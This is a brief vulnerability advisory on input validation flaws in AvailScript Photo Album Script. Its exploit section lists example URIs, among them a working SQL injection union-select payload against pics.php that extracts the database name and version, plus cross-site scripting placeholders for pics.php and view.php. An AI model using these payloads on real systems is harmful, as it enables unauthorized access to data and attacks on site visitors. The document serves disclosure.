AvailScript Photo Album Script Multiple Input Validation Vulnerabilities

info
discussion
exploit
solution
references

AvailScript Photo Album Script Multiple Input Validation Vulnerabilities

Attackers can exploit these issues through a browser. To exploit the cross-site scripting vulnerabilities, an attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--
http://www.example.com/path/pics.php?sid=[XSS]
http://www.example.com/path/view.php?a=[XSS]